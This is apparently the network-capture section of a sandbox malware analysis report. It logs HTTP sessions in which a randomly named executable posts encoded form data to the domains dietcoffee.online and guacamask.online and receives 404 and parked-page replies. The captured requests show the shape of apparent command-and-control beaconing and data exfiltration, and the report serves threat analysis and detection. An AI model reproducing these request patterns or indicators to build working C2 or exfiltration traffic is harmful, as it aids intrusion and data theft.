                                                                    Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.66424277.68.64.45802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:42.253525972 CET783OUTPOST /725g/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.dietcoffee.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.dietcoffee.online
                                                                    Referer: http://www.dietcoffee.online/725g/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 56 2f 77 71 32 6f 6a 68 45 33 50 43 58 4f 67 43 62 37 46 46 42 68 70 65 32 75 4f 32 39 46 63 57 52 38 6e 50 62 75 61 34 70 79 41 4d 65 49 65 68 69 52 49 6b 7a 6b 43 44 6d 7a 70 6b 49 4f 47 59 50 33 46 30 6d 6b 58 42 6d 6b 49 30 72 64 79 76 6c 55 34 55 6c 33 62 6c 2f 37 77 45 75 79 57 4b 32 6f 39 7a 49 55 46 48 76 51 36 33 78 52 31 79 71 73 31 58 59 54 67 6a 6f 77 78 66 57 73 64 68 4e 37 6c 41 33 6e 46 74 6e 6b 59 46 2f 46 67 32 62 36 70 67 54 67 59 68 31 72 30 63 69 35 76 31 50 62 71 6a 63 75 6c 31 38 57 79 59 64 62 4e 52 6b 70 58 57 4f 47 61 78 69 38 39 55 4e 2b 4e 70 74 49 55 2f 43 56 59 51 6d 6c 78 42 2f 51 65 58 51 5a 64 39 61 77 3d 3d
                                                                    Data Ascii: bJMLqbS=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FcWR8nPbua4pyAMeIehiRIkzkCDmzpkIOGYP3F0mkXBmkI0rdyvlU4Ul3bl/7wEuyWK2o9zIUFHvQ63xR1yqs1XYTgjowxfWsdhN7lA3nFtnkYF/Fg2b6pgTgYh1r0ci5v1Pbqjcul18WyYdbNRkpXWOGaxi89UN+NptIU/CVYQmlxB/QeXQZd9aw==
                                                                    Jan 10, 2025 21:32:42.836327076 CET393INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.25.3
                                                                    Date: Fri, 10 Jan 2025 20:32:43 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.66424377.68.64.45802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:45.187633038 CET1796OUTPOST /725g/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.dietcoffee.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.dietcoffee.online
                                                                    Referer: http://www.dietcoffee.online/725g/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 56 2f 77 71 32 6f 6a 68 45 33 50 43 58 4f 67 43 62 37 46 46 42 68 70 65 32 75 4f 32 39 46 55 57 52 4f 66 50 64 4e 79 34 6f 79 41 4d 55 6f 65 69 69 52 49 74 7a 6b 4b 48 6d 7a 31 30 49 4e 75 59 50 52 5a 30 67 51 44 42 7a 55 49 30 6a 39 79 73 71 30 35 57 6c 33 4c 70 2f 37 67 45 75 79 57 4b 32 75 35 7a 59 31 46 48 70 51 36 77 32 52 31 75 68 4d 30 49 59 54 34 56 6f 77 46 68 58 63 39 68 4e 66 42 41 73 31 74 74 72 6b 59 48 73 31 67 75 62 36 31 37 54 67 45 36 31 71 77 32 69 36 7a 31 4e 73 4c 34 48 63 73 69 69 6b 65 68 49 38 70 53 38 76 6e 37 44 45 61 31 72 75 6c 37 49 39 38 47 6f 64 38 6f 48 6c 4e 56 75 45 30 30 37 55 7a 68 64 71 67 33 49 4f 64 2b 53 44 43 47 41 32 44 6d 64 2b 33 30 44 50 6c 52 6e 5a 45 36 52 31 54 67 46 4d 32 64 6c 74 6a 6f 41 44 34 47 6e 6c 6a 78 61 34 6f 53 30 50 79 2f 38 66 43 75 76 51 2f 59 50 46 31 35 5a 62 70 54 59 36 32 48 6d 70 4b 69 57 56 34 77 72 63 57 4b 35 31 39 52 51 76 32 65 2f 4b 42 2b 35 43 36 33 41 6b 42 4d 71 73 [TRUNCATED]
                                                                    Data Ascii: bJMLqbS=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FUWROfPdNy4oyAMUoeiiRItzkKHmz10INuYPRZ0gQDBzUI0j9ysq05Wl3Lp/7gEuyWK2u5zY1FHpQ6w2R1uhM0IYT4VowFhXc9hNfBAs1ttrkYHs1gub617TgE61qw2i6z1NsL4HcsiikehI8pS8vn7DEa1rul7I98God8oHlNVuE007Uzhdqg3IOd+SDCGA2Dmd+30DPlRnZE6R1TgFM2dltjoAD4Gnljxa4oS0Py/8fCuvQ/YPF15ZbpTY62HmpKiWV4wrcWK519RQv2e/KB+5C63AkBMqs4QTKHtYU6jU36A48BbAJxTfzaNdI4BXcD5ZiMfQF017FySUtFXUUjEWhHoLXj696Z36eMpVYFJFaSSKjd+mL2xfX8sCBE7oB+wJW/QACu5Oa3G6M4rQMiO6XUvsniud0q1HPUd9/SKkFcdcdD2DhMTw7cj5ZCpWHPd9xNYeWV2HFK3LCi733wUUT+2Yzs7vzp+mD7YgoIB+MZ0AoX3oFnur3OQQ2vvEXOVDnyvM7HbJDG2+eOgZm5xJvLDWxzLaTWcl+OO/Of+Naxn995y1EKvjaRTPrW0WPuUeVWqZKxDZ+1UDmKhWMqTUXXrb+lO+qRHj1HU+oB/VvuVRgcs971O89Gkis/j/i9S5FUYKS/F+GU/lBu6/AD0Dv+cpa3y09pzzz5ZKsa3IuA6IJK/Dl21PkHHjGX0aMuthzbtMHcl1maeQDI+7U2yTbiPVhpDt2OV4vwLNrBsboU4nCs01MO98DH6OBcOZr3mxoUzG/d/bpBdpVDRsW/pIJ6T9vYYQXD36S0i8lStuMWqUEZeqTl0jogjYk+x2dMEyTHERB8bAbN/s1T/zHNCMn4Hn6N6t7i3fSZvVsO7wY6mwiAOGxATEwhchj9yDpPhwQVmCTaW4UwiVKRqlDjvvS5GhAtwx6puBXKiZ1KOS4D+vOzFdV40piNGz2SNIGl1 [TRUNCATED]
                                                                    Jan 10, 2025 21:32:45.772799969 CET393INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.25.3
                                                                    Date: Fri, 10 Jan 2025 20:32:46 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.66424477.68.64.45802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:47.751015902 CET493OUTGET /725g/?bJMLqbS=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.dietcoffee.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:32:48.368899107 CET373INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.25.3
                                                                    Date: Fri, 10 Jan 2025 20:32:49 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 32 35 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.664245208.91.197.27802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:53.641719103 CET756OUTPOST /v2ut/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.guacamask.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.guacamask.online
                                                                    Referer: http://www.guacamask.online/v2ut/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 73 6c 5a 5a 76 78 61 2f 31 43 73 49 62 2b 42 72 30 2b 4e 56 37 67 77 64 74 71 4f 2f 42 4a 57 59 48 4b 49 4e 30 62 47 56 77 62 36 62 62 34 2b 62 75 34 46 55 2b 5a 50 7a 6f 4c 39 7a 34 70 4a 6a 4b 71 75 35 76 31 46 72 41 55 6c 35 69 73 79 43 4b 58 38 50 75 41 48 31 39 39 53 55 49 4e 72 41 42 37 39 61 50 45 56 53 43 78 6f 62 79 52 4c 32 38 37 4e 37 4c 7a 78 41 2b 6e 42 36 48 50 53 7a 4d 2f 64 56 69 4d 77 4f 31 33 56 4a 52 71 51 4e 2f 42 41 71 2b 74 69 6f 2b 61 57 74 42 6c 57 61 6e 4e 39 34 78 64 55 59 30 79 2f 52 64 63 54 38 4c 79 6d 75 5a 47 37 6a 37 43 78 6f 52 42 45 79
                                                                    Data Ascii: bJMLqbS=cwNQIXCQp2K9slZZvxa/1CsIb+Br0+NV7gwdtqO/BJWYHKIN0bGVwb6bb4+bu4FU+ZPzoL9z4pJjKqu5v1FrAUl5isyCKX8PuAH199SUINrAB79aPEVSCxobyRL287N7LzxA+nB6HPSzM/dViMwO13VJRqQN/BAq+tio+aWtBlWanN94xdUY0y/RdcT8LymuZG7j7CxoRBEy


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.664246208.91.197.27802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:56.187534094 CET780OUTPOST /v2ut/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.guacamask.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.guacamask.online
                                                                    Referer: http://www.guacamask.online/v2ut/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 75 47 52 5a 70 53 79 2f 2b 43 73 4c 48 4f 42 72 39 65 4d 63 37 67 4d 64 74 6f 6a 6b 41 39 36 59 4a 49 41 4e 33 61 47 56 6a 72 36 62 51 59 2b 61 71 34 46 62 2b 5a 43 4d 6f 4f 64 7a 34 70 64 6a 4b 6f 47 35 76 45 46 30 41 45 6c 42 76 4d 79 4d 4a 6e 38 50 75 41 48 31 39 35 37 4a 49 4d 50 41 42 4f 74 61 4e 6c 56 52 42 78 6f 63 6c 68 4c 32 34 37 4e 2f 4c 7a 78 69 2b 69 5a 55 48 4e 36 7a 4d 2b 74 56 6c 66 6f 4e 69 48 56 4c 63 4b 52 6b 79 44 67 6b 79 64 37 66 36 49 54 49 52 6b 43 39 6d 37 67 69 74 75 55 37 6d 69 66 54 64 65 4c 4f 4c 53 6d 45 62 47 44 6a 70 56 39 50 65 31 68 52 30 4c 32 39 72 59 61 58 33 44 41 42 54 67 57 34 62 38 76 33 37 51 3d 3d
                                                                    Data Ascii: bJMLqbS=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA96YJIAN3aGVjr6bQY+aq4Fb+ZCMoOdz4pdjKoG5vEF0AElBvMyMJn8PuAH1957JIMPABOtaNlVRBxoclhL247N/Lzxi+iZUHN6zM+tVlfoNiHVLcKRkyDgkyd7f6ITIRkC9m7gituU7mifTdeLOLSmEbGDjpV9Pe1hR0L29rYaX3DABTgW4b8v37Q==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.664247208.91.197.27802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:58.734687090 CET1793OUTPOST /v2ut/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.guacamask.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.guacamask.online
                                                                    Referer: http://www.guacamask.online/v2ut/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 75 47 52 5a 70 53 79 2f 2b 43 73 4c 48 4f 42 72 39 65 4d 63 37 67 4d 64 74 6f 6a 6b 41 39 79 59 4a 36 34 4e 30 39 53 56 67 72 36 62 54 59 2b 66 71 34 46 38 2b 5a 4c 46 6f 4f 5a 6a 34 71 6c 6a 4d 4c 2b 35 70 77 70 30 4c 45 6c 42 77 63 79 4e 4b 58 38 47 75 47 6e 35 39 39 66 4a 49 4d 50 41 42 4a 56 61 44 6b 56 52 48 78 6f 62 79 52 4c 71 38 37 4e 62 4c 7a 6f 64 2b 6a 4a 71 48 39 61 7a 4e 65 39 56 67 74 77 4e 2b 58 56 7a 66 4b 52 38 79 44 74 6d 79 64 57 6b 36 4a 32 74 52 6d 65 39 72 74 39 2f 39 74 59 55 77 52 76 46 64 50 76 4f 54 55 4f 78 57 32 7a 7a 75 54 4e 37 52 6e 39 34 31 62 69 69 6a 6f 37 33 31 67 4d 4d 58 6d 44 78 56 49 71 65 70 38 4c 37 6e 2b 57 6c 53 35 59 6f 62 6f 54 41 50 65 57 42 6d 57 7a 33 4b 73 56 50 6b 71 4e 78 44 6f 39 57 70 6b 65 73 73 4b 47 4c 77 52 6d 78 6e 47 47 6d 47 70 6d 79 70 6c 48 52 63 66 53 4f 6b 59 4b 57 47 58 2f 43 55 67 42 38 4e 59 74 30 42 59 42 46 6d 66 37 41 31 38 7a 46 69 46 58 43 6a 72 74 58 47 72 6c 43 35 46 [TRUNCATED]
                                                                    Data Ascii: bJMLqbS=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA9yYJ64N09SVgr6bTY+fq4F8+ZLFoOZj4qljML+5pwp0LElBwcyNKX8GuGn599fJIMPABJVaDkVRHxobyRLq87NbLzod+jJqH9azNe9VgtwN+XVzfKR8yDtmydWk6J2tRme9rt9/9tYUwRvFdPvOTUOxW2zzuTN7Rn941biijo731gMMXmDxVIqep8L7n+WlS5YoboTAPeWBmWz3KsVPkqNxDo9WpkessKGLwRmxnGGmGpmyplHRcfSOkYKWGX/CUgB8NYt0BYBFmf7A18zFiFXCjrtXGrlC5Fy5PIXxryW8dG5jbSiPDkxfNlUZJrTEF7e0KAXkVj7Jw534dUMgNtAIkeTPF/Cm6vUHXmOIP063UHojzb9fZ4yODBeT4vGe9zzB9qxksQxYiZVWf/F8lhyA1A4RDxhOkfcnrO/oOTQvSsK+8mbsBjcSh+LmIYQQH5fzkHPt1Oyu6RKZLZJJQRYU9eOnwn+F+DZgXFZqRmk0wTIuhgIlmHbdB19duXr9IX54uXQINKIQxatEeXi6vg5tdMk7LCRyDzzavH/e+X+f/csB4+yAMtcgSGIWr7t1wUKBNCxWhBtfRD6RWJxuDvrFQhfKGVt69R/OBxRnykrOyeMBTFmAwNsGSjJNqQtisA6PC/3J/rD8wl7YMx6Nsh2p8NovXBtRJ5CZXM+yL2E+XXoK9IrJ2d+Dj9pourpZcfXj0apNFJEvR8g9n6BvjDLTKcU+k8B3rlOCWHP+cmkcWkVnuug70AjdkxKbkD3HLEXeKzYCVypkdpZgUkIgvOOKMexwquQYgYRjqY5TJ/TNFSpq5P9yVgKQajMS0n1Zm5JGDrWUvOczOu3tY4CyR0bjpcvwUcfOU0U/YWbImKbYRyvjjwYoHBdfbFyxCvc5zOnFLXqRRrA3dctwEFszQ48r/RtAaoMl6tTn18grDsgceaqI7dNEHLdp+ORZlcNTjWgW [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.664248208.91.197.27802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:33:01.275188923 CET492OUTGET /v2ut/?xHrti=IpSlbxE0jR&bJMLqbS=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLIzhxo/qMOX8MgFiq9bThHJniXb4lO04jER0alxiz9odaEmB/xSI= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.guacamask.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:33:02.365308046 CET1236INHTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:33:01 GMT
                                                                    Server: Apache
                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                    Set-Cookie: vsid=908vr48408678150484331; expires=Wed, 09-Jan-2030 20:33:01 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Connection: close
                                                                    Data Raw: 34 31 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 59 50 47 6a 7a 6c 65 42 62 74 6f 37 68 78 4d 73 72 54 37 48 74 64 7a 34 4a 75 33 36 2b 37 2f 46 42 58 4d 74 4d 72 56 7a 76 66 71 6d 6d 58 59 61 74 41 43 49 77 41 59 31 61 35 50 43 37 6b 56 47 38 56 4a 41 37 34 55 37 6f 30 62 37 33 57 4a 4e 2f 6e 54 61 4a 77 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED]
                                                                    Data Ascii: 418c<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_YPGjzleBbto7hxMsrT7Htdz4Ju36+7/FBXMtMrVzvfqmmXYatACIwAY1a5PC7kVG8VJA74U7o0b73WJN/nTaJw==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-
                                                                    Jan 10, 2025 21:33:02.365323067 CET224INData Raw: 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 67 75 61 63 61 6d 61 73 6b 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 2e 61 73 73 65 74 5f 73 74
                                                                    Data Ascii: fit=no"/> <title>guacamask.online</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inl
                                                                    Jan 10, 2025 21:33:02.365345955 CET1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 61 73 73 65 74 5f 73 74 61 72 31 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 2f 64 33 38 70 73 72 6e 69 31 37 62 76 78 75 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 74 68 65
                                                                    Data Ascii: ine-block;}.asset_star1 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star1.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.asset_starH {background: url('//d38psrni17bvxu.cloudfront.net
